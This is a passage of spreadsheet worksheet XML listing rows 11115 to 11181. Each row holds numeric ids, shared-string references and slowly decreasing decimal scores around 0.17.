        <v>0.1772486772486773</v>
      </c>
    </row>
    <row r="11115" ht="15.75" customHeight="1">
      <c r="A11115" s="1">
        <v>26885.0</v>
      </c>
      <c r="B11115" s="2">
        <v>1.9207085E7</v>
      </c>
      <c r="C11115" s="2" t="s">
        <v>10655</v>
      </c>
      <c r="D11115" s="2">
        <v>1.0</v>
      </c>
      <c r="E11115" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11115" s="2">
        <v>0.1772486772486773</v>
      </c>
    </row>
    <row r="11116" ht="15.75" customHeight="1">
      <c r="A11116" s="1">
        <v>17505.0</v>
      </c>
      <c r="B11116" s="2">
        <v>5.0005842E7</v>
      </c>
      <c r="C11116" s="2" t="s">
        <v>10656</v>
      </c>
      <c r="D11116" s="2">
        <v>1.0</v>
      </c>
      <c r="E11116" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11116" s="2">
        <v>0.1770370370370371</v>
      </c>
    </row>
    <row r="11117" ht="15.75" customHeight="1">
      <c r="A11117" s="1">
        <v>8907.0</v>
      </c>
      <c r="B11117" s="2">
        <v>5.4799898E7</v>
      </c>
      <c r="C11117" s="2" t="s">
        <v>10657</v>
      </c>
      <c r="D11117" s="2">
        <v>1.0</v>
      </c>
      <c r="E11117" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11117" s="2">
        <v>0.1769230769230769</v>
      </c>
    </row>
    <row r="11118" ht="15.75" customHeight="1">
      <c r="A11118" s="1">
        <v>18687.0</v>
      </c>
      <c r="B11118" s="2">
        <v>5.3592645E7</v>
      </c>
      <c r="C11118" s="2" t="s">
        <v>10658</v>
      </c>
      <c r="D11118" s="2">
        <v>1.0</v>
      </c>
      <c r="E11118" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11118" s="2">
        <v>0.1768518518518519</v>
      </c>
    </row>
    <row r="11119" ht="15.75" customHeight="1">
      <c r="A11119" s="1">
        <v>19286.0</v>
      </c>
      <c r="B11119" s="2">
        <v>5.5169394E7</v>
      </c>
      <c r="C11119" s="2" t="s">
        <v>10659</v>
      </c>
      <c r="D11119" s="2">
        <v>1.0</v>
      </c>
      <c r="E11119" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11119" s="2">
        <v>0.1754850088183422</v>
      </c>
    </row>
    <row r="11120" ht="15.75" customHeight="1">
      <c r="A11120" s="1">
        <v>6750.0</v>
      </c>
      <c r="B11120" s="2">
        <v>4.9389255E7</v>
      </c>
      <c r="C11120" s="2" t="s">
        <v>10660</v>
      </c>
      <c r="D11120" s="2">
        <v>1.0</v>
      </c>
      <c r="E11120" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11120" s="2">
        <v>0.1752873563218391</v>
      </c>
    </row>
    <row r="11121" ht="15.75" customHeight="1">
      <c r="A11121" s="1">
        <v>14011.0</v>
      </c>
      <c r="B11121" s="2">
        <v>3.7421378E7</v>
      </c>
      <c r="C11121" s="2" t="s">
        <v>10661</v>
      </c>
      <c r="D11121" s="2">
        <v>1.0</v>
      </c>
      <c r="E11121" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11121" s="2">
        <v>0.1752873563218391</v>
      </c>
    </row>
    <row r="11122" ht="15.75" customHeight="1">
      <c r="A11122" s="1">
        <v>16089.0</v>
      </c>
      <c r="B11122" s="2">
        <v>4.5386471E7</v>
      </c>
      <c r="C11122" s="2" t="s">
        <v>10662</v>
      </c>
      <c r="D11122" s="2">
        <v>1.0</v>
      </c>
      <c r="E11122" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11122" s="2">
        <v>0.1752873563218391</v>
      </c>
    </row>
    <row r="11123" ht="15.75" customHeight="1">
      <c r="A11123" s="1">
        <v>18617.0</v>
      </c>
      <c r="B11123" s="2">
        <v>5.3337014E7</v>
      </c>
      <c r="C11123" s="2" t="s">
        <v>10662</v>
      </c>
      <c r="D11123" s="2">
        <v>1.0</v>
      </c>
      <c r="E11123" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11123" s="2">
        <v>0.1752873563218391</v>
      </c>
    </row>
    <row r="11124" ht="15.75" customHeight="1">
      <c r="A11124" s="1">
        <v>30271.0</v>
      </c>
      <c r="B11124" s="2">
        <v>3.7685835E7</v>
      </c>
      <c r="C11124" s="2" t="s">
        <v>10663</v>
      </c>
      <c r="D11124" s="2">
        <v>1.0</v>
      </c>
      <c r="E11124" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11124" s="2">
        <v>0.1752873563218391</v>
      </c>
    </row>
    <row r="11125" ht="15.75" customHeight="1">
      <c r="A11125" s="1">
        <v>4667.0</v>
      </c>
      <c r="B11125" s="2">
        <v>4.3141629E7</v>
      </c>
      <c r="C11125" s="2" t="s">
        <v>10664</v>
      </c>
      <c r="D11125" s="2">
        <v>1.0</v>
      </c>
      <c r="E11125" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11125" s="2">
        <v>0.1752136752136753</v>
      </c>
    </row>
    <row r="11126" ht="15.75" customHeight="1">
      <c r="A11126" s="1">
        <v>33656.0</v>
      </c>
      <c r="B11126" s="2">
        <v>8399338.0</v>
      </c>
      <c r="C11126" s="2" t="s">
        <v>10665</v>
      </c>
      <c r="D11126" s="2">
        <v>1.0</v>
      </c>
      <c r="E11126" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11126" s="2">
        <v>0.1751543209876543</v>
      </c>
    </row>
    <row r="11127" ht="15.75" customHeight="1">
      <c r="A11127" s="1">
        <v>9135.0</v>
      </c>
      <c r="B11127" s="2">
        <v>5.5240562E7</v>
      </c>
      <c r="C11127" s="2" t="s">
        <v>10666</v>
      </c>
      <c r="D11127" s="2">
        <v>1.0</v>
      </c>
      <c r="E11127" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11127" s="2">
        <v>0.1751054852320675</v>
      </c>
    </row>
    <row r="11128" ht="15.75" customHeight="1">
      <c r="A11128" s="1">
        <v>17748.0</v>
      </c>
      <c r="B11128" s="2">
        <v>5.0680936E7</v>
      </c>
      <c r="C11128" s="2" t="s">
        <v>10667</v>
      </c>
      <c r="D11128" s="2">
        <v>1.0</v>
      </c>
      <c r="E11128" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11128" s="2">
        <v>0.175</v>
      </c>
    </row>
    <row r="11129" ht="15.75" customHeight="1">
      <c r="A11129" s="1">
        <v>5954.0</v>
      </c>
      <c r="B11129" s="2">
        <v>4.7287552E7</v>
      </c>
      <c r="C11129" s="2" t="s">
        <v>10668</v>
      </c>
      <c r="D11129" s="2">
        <v>1.0</v>
      </c>
      <c r="E11129" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11129" s="2">
        <v>0.1744791666666667</v>
      </c>
    </row>
    <row r="11130" ht="15.75" customHeight="1">
      <c r="A11130" s="1">
        <v>29425.0</v>
      </c>
      <c r="B11130" s="2">
        <v>3.2219188E7</v>
      </c>
      <c r="C11130" s="2" t="s">
        <v>10669</v>
      </c>
      <c r="D11130" s="2">
        <v>1.0</v>
      </c>
      <c r="E11130" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11130" s="2">
        <v>0.1744791666666667</v>
      </c>
    </row>
    <row r="11131" ht="15.75" customHeight="1">
      <c r="A11131" s="1">
        <v>14010.0</v>
      </c>
      <c r="B11131" s="2">
        <v>3.74073E7</v>
      </c>
      <c r="C11131" s="2" t="s">
        <v>10670</v>
      </c>
      <c r="D11131" s="2">
        <v>1.0</v>
      </c>
      <c r="E11131" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11131" s="2">
        <v>0.1744639376218324</v>
      </c>
    </row>
    <row r="11132" ht="15.75" customHeight="1">
      <c r="A11132" s="1">
        <v>8359.0</v>
      </c>
      <c r="B11132" s="2">
        <v>5.3758737E7</v>
      </c>
      <c r="C11132" s="2" t="s">
        <v>10671</v>
      </c>
      <c r="D11132" s="2">
        <v>1.0</v>
      </c>
      <c r="E11132" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11132" s="2">
        <v>0.1742424242424243</v>
      </c>
    </row>
    <row r="11133" ht="15.75" customHeight="1">
      <c r="A11133" s="1">
        <v>25405.0</v>
      </c>
      <c r="B11133" s="2">
        <v>1.37706E7</v>
      </c>
      <c r="C11133" s="2" t="s">
        <v>10672</v>
      </c>
      <c r="D11133" s="2">
        <v>1.0</v>
      </c>
      <c r="E11133" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11133" s="2">
        <v>0.1742424242424243</v>
      </c>
    </row>
    <row r="11134" ht="15.75" customHeight="1">
      <c r="A11134" s="1">
        <v>14997.0</v>
      </c>
      <c r="B11134" s="2">
        <v>4.1449362E7</v>
      </c>
      <c r="C11134" s="2" t="s">
        <v>10673</v>
      </c>
      <c r="D11134" s="2">
        <v>1.0</v>
      </c>
      <c r="E11134" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11134" s="2">
        <v>0.1739526411657559</v>
      </c>
    </row>
    <row r="11135" ht="15.75" customHeight="1">
      <c r="A11135" s="1">
        <v>25498.0</v>
      </c>
      <c r="B11135" s="2">
        <v>1.4102064E7</v>
      </c>
      <c r="C11135" s="2" t="s">
        <v>10674</v>
      </c>
      <c r="D11135" s="2">
        <v>1.0</v>
      </c>
      <c r="E11135" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11135" s="2">
        <v>0.1736111111111111</v>
      </c>
    </row>
    <row r="11136" ht="15.75" customHeight="1">
      <c r="A11136" s="1">
        <v>9493.0</v>
      </c>
      <c r="B11136" s="2">
        <v>5.5917992E7</v>
      </c>
      <c r="C11136" s="2" t="s">
        <v>10675</v>
      </c>
      <c r="D11136" s="2">
        <v>1.0</v>
      </c>
      <c r="E11136" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11136" s="2">
        <v>0.1731481481481482</v>
      </c>
    </row>
    <row r="11137" ht="15.75" customHeight="1">
      <c r="A11137" s="1">
        <v>9568.0</v>
      </c>
      <c r="B11137" s="2">
        <v>5.6054661E7</v>
      </c>
      <c r="C11137" s="2" t="s">
        <v>10676</v>
      </c>
      <c r="D11137" s="2">
        <v>1.0</v>
      </c>
      <c r="E11137" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11137" s="2">
        <v>0.1731481481481481</v>
      </c>
    </row>
    <row r="11138" ht="15.75" customHeight="1">
      <c r="A11138" s="1">
        <v>6853.0</v>
      </c>
      <c r="B11138" s="2">
        <v>4.9646347E7</v>
      </c>
      <c r="C11138" s="2" t="s">
        <v>10677</v>
      </c>
      <c r="D11138" s="2">
        <v>1.0</v>
      </c>
      <c r="E11138" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11138" s="2">
        <v>0.1726190476190476</v>
      </c>
    </row>
    <row r="11139" ht="15.75" customHeight="1">
      <c r="A11139" s="1">
        <v>1257.0</v>
      </c>
      <c r="B11139" s="2">
        <v>2.5207648E7</v>
      </c>
      <c r="C11139" s="2" t="s">
        <v>10678</v>
      </c>
      <c r="D11139" s="2">
        <v>1.0</v>
      </c>
      <c r="E11139" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11139" s="2">
        <v>0.172316384180791</v>
      </c>
    </row>
    <row r="11140" ht="15.75" customHeight="1">
      <c r="A11140" s="1">
        <v>3941.0</v>
      </c>
      <c r="B11140" s="2">
        <v>4.0611111E7</v>
      </c>
      <c r="C11140" s="2" t="s">
        <v>10679</v>
      </c>
      <c r="D11140" s="2">
        <v>1.0</v>
      </c>
      <c r="E11140" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11140" s="2">
        <v>0.172316384180791</v>
      </c>
    </row>
    <row r="11141" ht="15.75" customHeight="1">
      <c r="A11141" s="1">
        <v>8102.0</v>
      </c>
      <c r="B11141" s="2">
        <v>5.3060119E7</v>
      </c>
      <c r="C11141" s="2" t="s">
        <v>10680</v>
      </c>
      <c r="D11141" s="2">
        <v>1.0</v>
      </c>
      <c r="E11141" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11141" s="2">
        <v>0.172316384180791</v>
      </c>
    </row>
    <row r="11142" ht="15.75" customHeight="1">
      <c r="A11142" s="1">
        <v>9929.0</v>
      </c>
      <c r="B11142" s="2">
        <v>5.6830851E7</v>
      </c>
      <c r="C11142" s="2" t="s">
        <v>10681</v>
      </c>
      <c r="D11142" s="2">
        <v>1.0</v>
      </c>
      <c r="E11142" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11142" s="2">
        <v>0.172316384180791</v>
      </c>
    </row>
    <row r="11143" ht="15.75" customHeight="1">
      <c r="A11143" s="1">
        <v>18378.0</v>
      </c>
      <c r="B11143" s="2">
        <v>5.2577789E7</v>
      </c>
      <c r="C11143" s="2" t="s">
        <v>10682</v>
      </c>
      <c r="D11143" s="2">
        <v>1.0</v>
      </c>
      <c r="E11143" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11143" s="2">
        <v>0.172316384180791</v>
      </c>
    </row>
    <row r="11144" ht="15.75" customHeight="1">
      <c r="A11144" s="1">
        <v>19977.0</v>
      </c>
      <c r="B11144" s="2">
        <v>5.760469E7</v>
      </c>
      <c r="C11144" s="2" t="s">
        <v>10683</v>
      </c>
      <c r="D11144" s="2">
        <v>1.0</v>
      </c>
      <c r="E11144" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11144" s="2">
        <v>0.172316384180791</v>
      </c>
    </row>
    <row r="11145" ht="15.75" customHeight="1">
      <c r="A11145" s="1">
        <v>22795.0</v>
      </c>
      <c r="B11145" s="2">
        <v>4.5529756E7</v>
      </c>
      <c r="C11145" s="2" t="s">
        <v>10684</v>
      </c>
      <c r="D11145" s="2">
        <v>1.0</v>
      </c>
      <c r="E11145" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11145" s="2">
        <v>0.172316384180791</v>
      </c>
    </row>
    <row r="11146" ht="15.75" customHeight="1">
      <c r="A11146" s="1">
        <v>8007.0</v>
      </c>
      <c r="B11146" s="2">
        <v>5.2784878E7</v>
      </c>
      <c r="C11146" s="2" t="s">
        <v>10685</v>
      </c>
      <c r="D11146" s="2">
        <v>1.0</v>
      </c>
      <c r="E11146" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11146" s="2">
        <v>0.1721311475409836</v>
      </c>
    </row>
    <row r="11147" ht="15.75" customHeight="1">
      <c r="A11147" s="1">
        <v>2442.0</v>
      </c>
      <c r="B11147" s="2">
        <v>3.3689947E7</v>
      </c>
      <c r="C11147" s="2" t="s">
        <v>10686</v>
      </c>
      <c r="D11147" s="2">
        <v>1.0</v>
      </c>
      <c r="E11147" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11147" s="2">
        <v>0.1719576719576721</v>
      </c>
    </row>
    <row r="11148" ht="15.75" customHeight="1">
      <c r="A11148" s="1">
        <v>25924.0</v>
      </c>
      <c r="B11148" s="2">
        <v>1.5186025E7</v>
      </c>
      <c r="C11148" s="2" t="s">
        <v>10687</v>
      </c>
      <c r="D11148" s="2">
        <v>1.0</v>
      </c>
      <c r="E11148" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11148" s="2">
        <v>0.171921921921922</v>
      </c>
    </row>
    <row r="11149" ht="15.75" customHeight="1">
      <c r="A11149" s="1">
        <v>3353.0</v>
      </c>
      <c r="B11149" s="2">
        <v>3.7813812E7</v>
      </c>
      <c r="C11149" s="2" t="s">
        <v>10688</v>
      </c>
      <c r="D11149" s="2">
        <v>1.0</v>
      </c>
      <c r="E11149" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11149" s="2">
        <v>0.1719219219219219</v>
      </c>
    </row>
    <row r="11150" ht="15.75" customHeight="1">
      <c r="A11150" s="1">
        <v>14467.0</v>
      </c>
      <c r="B11150" s="2">
        <v>3.9491087E7</v>
      </c>
      <c r="C11150" s="2" t="s">
        <v>10689</v>
      </c>
      <c r="D11150" s="2">
        <v>1.0</v>
      </c>
      <c r="E11150" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11150" s="2">
        <v>0.1717948717948719</v>
      </c>
    </row>
    <row r="11151" ht="15.75" customHeight="1">
      <c r="A11151" s="1">
        <v>18229.0</v>
      </c>
      <c r="B11151" s="2">
        <v>5.2108671E7</v>
      </c>
      <c r="C11151" s="2" t="s">
        <v>10690</v>
      </c>
      <c r="D11151" s="2">
        <v>1.0</v>
      </c>
      <c r="E11151" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11151" s="2">
        <v>0.1717948717948718</v>
      </c>
    </row>
    <row r="11152" ht="15.75" customHeight="1">
      <c r="A11152" s="1">
        <v>28045.0</v>
      </c>
      <c r="B11152" s="2">
        <v>2.4538133E7</v>
      </c>
      <c r="C11152" s="2" t="s">
        <v>10691</v>
      </c>
      <c r="D11152" s="2">
        <v>1.0</v>
      </c>
      <c r="E11152" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11152" s="2">
        <v>0.1716269841269842</v>
      </c>
    </row>
    <row r="11153" ht="15.75" customHeight="1">
      <c r="A11153" s="1">
        <v>457.0</v>
      </c>
      <c r="B11153" s="2">
        <v>1.7255556E7</v>
      </c>
      <c r="C11153" s="2" t="s">
        <v>10692</v>
      </c>
      <c r="D11153" s="2">
        <v>1.0</v>
      </c>
      <c r="E11153" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11153" s="2">
        <v>0.1707516339869282</v>
      </c>
    </row>
    <row r="11154" ht="15.75" customHeight="1">
      <c r="A11154" s="1">
        <v>9256.0</v>
      </c>
      <c r="B11154" s="2">
        <v>5.5478011E7</v>
      </c>
      <c r="C11154" s="2" t="s">
        <v>10693</v>
      </c>
      <c r="D11154" s="2">
        <v>1.0</v>
      </c>
      <c r="E11154" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11154" s="2">
        <v>0.1705653021442496</v>
      </c>
    </row>
    <row r="11155" ht="15.75" customHeight="1">
      <c r="A11155" s="1">
        <v>8293.0</v>
      </c>
      <c r="B11155" s="2">
        <v>5.3528885E7</v>
      </c>
      <c r="C11155" s="2" t="s">
        <v>10694</v>
      </c>
      <c r="D11155" s="2">
        <v>1.0</v>
      </c>
      <c r="E11155" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11155" s="2">
        <v>0.1704331450094162</v>
      </c>
    </row>
    <row r="11156" ht="15.75" customHeight="1">
      <c r="A11156" s="1">
        <v>15996.0</v>
      </c>
      <c r="B11156" s="2">
        <v>4.4960784E7</v>
      </c>
      <c r="C11156" s="2" t="s">
        <v>10695</v>
      </c>
      <c r="D11156" s="2">
        <v>1.0</v>
      </c>
      <c r="E11156" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11156" s="2">
        <v>0.1704331450094162</v>
      </c>
    </row>
    <row r="11157" ht="15.75" customHeight="1">
      <c r="A11157" s="1">
        <v>15497.0</v>
      </c>
      <c r="B11157" s="2">
        <v>4.3201183E7</v>
      </c>
      <c r="C11157" s="2" t="s">
        <v>10696</v>
      </c>
      <c r="D11157" s="2">
        <v>1.0</v>
      </c>
      <c r="E11157" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11157" s="2">
        <v>0.1703216374269006</v>
      </c>
    </row>
    <row r="11158" ht="15.75" customHeight="1">
      <c r="A11158" s="1">
        <v>21333.0</v>
      </c>
      <c r="B11158" s="2">
        <v>2.1061789E7</v>
      </c>
      <c r="C11158" s="2" t="s">
        <v>10697</v>
      </c>
      <c r="D11158" s="2">
        <v>1.0</v>
      </c>
      <c r="E11158" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11158" s="2">
        <v>0.1697965571205008</v>
      </c>
    </row>
    <row r="11159" ht="15.75" customHeight="1">
      <c r="A11159" s="1">
        <v>17053.0</v>
      </c>
      <c r="B11159" s="2">
        <v>4.8539018E7</v>
      </c>
      <c r="C11159" s="2" t="s">
        <v>10698</v>
      </c>
      <c r="D11159" s="2">
        <v>1.0</v>
      </c>
      <c r="E11159" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11159" s="2">
        <v>0.1695526695526696</v>
      </c>
    </row>
    <row r="11160" ht="15.75" customHeight="1">
      <c r="A11160" s="1">
        <v>7102.0</v>
      </c>
      <c r="B11160" s="2">
        <v>5.0350519E7</v>
      </c>
      <c r="C11160" s="2" t="s">
        <v>10699</v>
      </c>
      <c r="D11160" s="2">
        <v>1.0</v>
      </c>
      <c r="E11160" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11160" s="2">
        <v>0.1695402298850575</v>
      </c>
    </row>
    <row r="11161" ht="15.75" customHeight="1">
      <c r="A11161" s="1">
        <v>6198.0</v>
      </c>
      <c r="B11161" s="2">
        <v>4.7959452E7</v>
      </c>
      <c r="C11161" s="2" t="s">
        <v>10700</v>
      </c>
      <c r="D11161" s="2">
        <v>1.0</v>
      </c>
      <c r="E11161" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11161" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="11162" ht="15.75" customHeight="1">
      <c r="A11162" s="1">
        <v>13466.0</v>
      </c>
      <c r="B11162" s="2">
        <v>3.5201419E7</v>
      </c>
      <c r="C11162" s="2" t="s">
        <v>10701</v>
      </c>
      <c r="D11162" s="2">
        <v>1.0</v>
      </c>
      <c r="E11162" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11162" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="11163" ht="15.75" customHeight="1">
      <c r="A11163" s="1">
        <v>13906.0</v>
      </c>
      <c r="B11163" s="2">
        <v>3.7089831E7</v>
      </c>
      <c r="C11163" s="2" t="s">
        <v>10702</v>
      </c>
      <c r="D11163" s="2">
        <v>1.0</v>
      </c>
      <c r="E11163" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11163" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="11164" ht="15.75" customHeight="1">
      <c r="A11164" s="1">
        <v>3080.0</v>
      </c>
      <c r="B11164" s="2">
        <v>3.6578847E7</v>
      </c>
      <c r="C11164" s="2" t="s">
        <v>10703</v>
      </c>
      <c r="D11164" s="2">
        <v>1.0</v>
      </c>
      <c r="E11164" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11164" s="2">
        <v>0.1692708333333334</v>
      </c>
    </row>
    <row r="11165" ht="15.75" customHeight="1">
      <c r="A11165" s="1">
        <v>7868.0</v>
      </c>
      <c r="B11165" s="2">
        <v>5.2394503E7</v>
      </c>
      <c r="C11165" s="2" t="s">
        <v>10704</v>
      </c>
      <c r="D11165" s="2">
        <v>1.0</v>
      </c>
      <c r="E11165" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11165" s="2">
        <v>0.1691919191919192</v>
      </c>
    </row>
    <row r="11166" ht="15.75" customHeight="1">
      <c r="A11166" s="1">
        <v>26909.0</v>
      </c>
      <c r="B11166" s="2">
        <v>1.9327889E7</v>
      </c>
      <c r="C11166" s="2" t="s">
        <v>10705</v>
      </c>
      <c r="D11166" s="2">
        <v>1.0</v>
      </c>
      <c r="E11166" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11166" s="2">
        <v>0.1691919191919192</v>
      </c>
    </row>
    <row r="11167" ht="15.75" customHeight="1">
      <c r="A11167" s="1">
        <v>3555.0</v>
      </c>
      <c r="B11167" s="2">
        <v>3.8812263E7</v>
      </c>
      <c r="C11167" s="2" t="s">
        <v>10706</v>
      </c>
      <c r="D11167" s="2">
        <v>1.0</v>
      </c>
      <c r="E11167" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11167" s="2">
        <v>0.1691176470588236</v>
      </c>
    </row>
    <row r="11168" ht="15.75" customHeight="1">
      <c r="A11168" s="1">
        <v>24792.0</v>
      </c>
      <c r="B11168" s="2">
        <v>1.1992965E7</v>
      </c>
      <c r="C11168" s="2" t="s">
        <v>10707</v>
      </c>
      <c r="D11168" s="2">
        <v>1.0</v>
      </c>
      <c r="E11168" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11168" s="2">
        <v>0.1689814814814816</v>
      </c>
    </row>
    <row r="11169" ht="15.75" customHeight="1">
      <c r="A11169" s="1">
        <v>14833.0</v>
      </c>
      <c r="B11169" s="2">
        <v>4.1021671E7</v>
      </c>
      <c r="C11169" s="2" t="s">
        <v>10708</v>
      </c>
      <c r="D11169" s="2">
        <v>1.0</v>
      </c>
      <c r="E11169" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11169" s="2">
        <v>0.1689814814814815</v>
      </c>
    </row>
    <row r="11170" ht="15.75" customHeight="1">
      <c r="A11170" s="1">
        <v>7620.0</v>
      </c>
      <c r="B11170" s="2">
        <v>5.1728649E7</v>
      </c>
      <c r="C11170" s="2" t="s">
        <v>10709</v>
      </c>
      <c r="D11170" s="2">
        <v>1.0</v>
      </c>
      <c r="E11170" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11170" s="2">
        <v>0.1685499058380414</v>
      </c>
    </row>
    <row r="11171" ht="15.75" customHeight="1">
      <c r="A11171" s="1">
        <v>18380.0</v>
      </c>
      <c r="B11171" s="2">
        <v>5.2582541E7</v>
      </c>
      <c r="C11171" s="2" t="s">
        <v>10710</v>
      </c>
      <c r="D11171" s="2">
        <v>1.0</v>
      </c>
      <c r="E11171" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11171" s="2">
        <v>0.1683250414593699</v>
      </c>
    </row>
    <row r="11172" ht="15.75" customHeight="1">
      <c r="A11172" s="1">
        <v>7367.0</v>
      </c>
      <c r="B11172" s="2">
        <v>5.1025552E7</v>
      </c>
      <c r="C11172" s="2" t="s">
        <v>10711</v>
      </c>
      <c r="D11172" s="2">
        <v>1.0</v>
      </c>
      <c r="E11172" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11172" s="2">
        <v>0.1682769726247987</v>
      </c>
    </row>
    <row r="11173" ht="15.75" customHeight="1">
      <c r="A11173" s="1">
        <v>17051.0</v>
      </c>
      <c r="B11173" s="2">
        <v>4.8539018E7</v>
      </c>
      <c r="C11173" s="2" t="s">
        <v>10712</v>
      </c>
      <c r="D11173" s="2">
        <v>1.0</v>
      </c>
      <c r="E11173" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11173" s="2">
        <v>0.1682316118935838</v>
      </c>
    </row>
    <row r="11174" ht="15.75" customHeight="1">
      <c r="A11174" s="1">
        <v>5398.0</v>
      </c>
      <c r="B11174" s="2">
        <v>4.5467433E7</v>
      </c>
      <c r="C11174" s="2" t="s">
        <v>10713</v>
      </c>
      <c r="D11174" s="2">
        <v>1.0</v>
      </c>
      <c r="E11174" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11174" s="2">
        <v>0.1675925925925926</v>
      </c>
    </row>
    <row r="11175" ht="15.75" customHeight="1">
      <c r="A11175" s="1">
        <v>7652.0</v>
      </c>
      <c r="B11175" s="2">
        <v>5.1791126E7</v>
      </c>
      <c r="C11175" s="2" t="s">
        <v>10714</v>
      </c>
      <c r="D11175" s="2">
        <v>1.0</v>
      </c>
      <c r="E11175" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11175" s="2">
        <v>0.1675925925925926</v>
      </c>
    </row>
    <row r="11176" ht="15.75" customHeight="1">
      <c r="A11176" s="1">
        <v>9167.0</v>
      </c>
      <c r="B11176" s="2">
        <v>5.532529E7</v>
      </c>
      <c r="C11176" s="2" t="s">
        <v>10715</v>
      </c>
      <c r="D11176" s="2">
        <v>1.0</v>
      </c>
      <c r="E11176" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11176" s="2">
        <v>0.1675925925925926</v>
      </c>
    </row>
    <row r="11177" ht="15.75" customHeight="1">
      <c r="A11177" s="1">
        <v>7004.0</v>
      </c>
      <c r="B11177" s="2">
        <v>5.0089912E7</v>
      </c>
      <c r="C11177" s="2" t="s">
        <v>10716</v>
      </c>
      <c r="D11177" s="2">
        <v>1.0</v>
      </c>
      <c r="E11177" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11177" s="2">
        <v>0.1675347222222223</v>
      </c>
    </row>
    <row r="11178" ht="15.75" customHeight="1">
      <c r="A11178" s="1">
        <v>16686.0</v>
      </c>
      <c r="B11178" s="2">
        <v>4.7317797E7</v>
      </c>
      <c r="C11178" s="2" t="s">
        <v>10717</v>
      </c>
      <c r="D11178" s="2">
        <v>1.0</v>
      </c>
      <c r="E11178" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11178" s="2">
        <v>0.1674603174603175</v>
      </c>
    </row>
    <row r="11179" ht="15.75" customHeight="1">
      <c r="A11179" s="1">
        <v>4798.0</v>
      </c>
      <c r="B11179" s="2">
        <v>4.3512056E7</v>
      </c>
      <c r="C11179" s="2" t="s">
        <v>10718</v>
      </c>
      <c r="D11179" s="2">
        <v>1.0</v>
      </c>
      <c r="E11179" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11179" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="11180" ht="15.75" customHeight="1">
      <c r="A11180" s="1">
        <v>6281.0</v>
      </c>
      <c r="B11180" s="2">
        <v>4.8156084E7</v>
      </c>
      <c r="C11180" s="2" t="s">
        <v>10719</v>
      </c>
      <c r="D11180" s="2">
        <v>1.0</v>
      </c>
      <c r="E11180" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11180" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="11181" ht="15.75" customHeight="1">
      <c r="A11181" s="1">
        <v>7025.0</v>
      </c>
      <c r="B11181" s="2">
        <v>5.0112416E7</v>
      </c>
      <c r="C11181" s="2" t="s">
        <v>10720</v>
      </c>
      <c r="D11181" s="2">
        <v>1.0</v>
      </c>
      <c r="E11181" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11181" s="2">
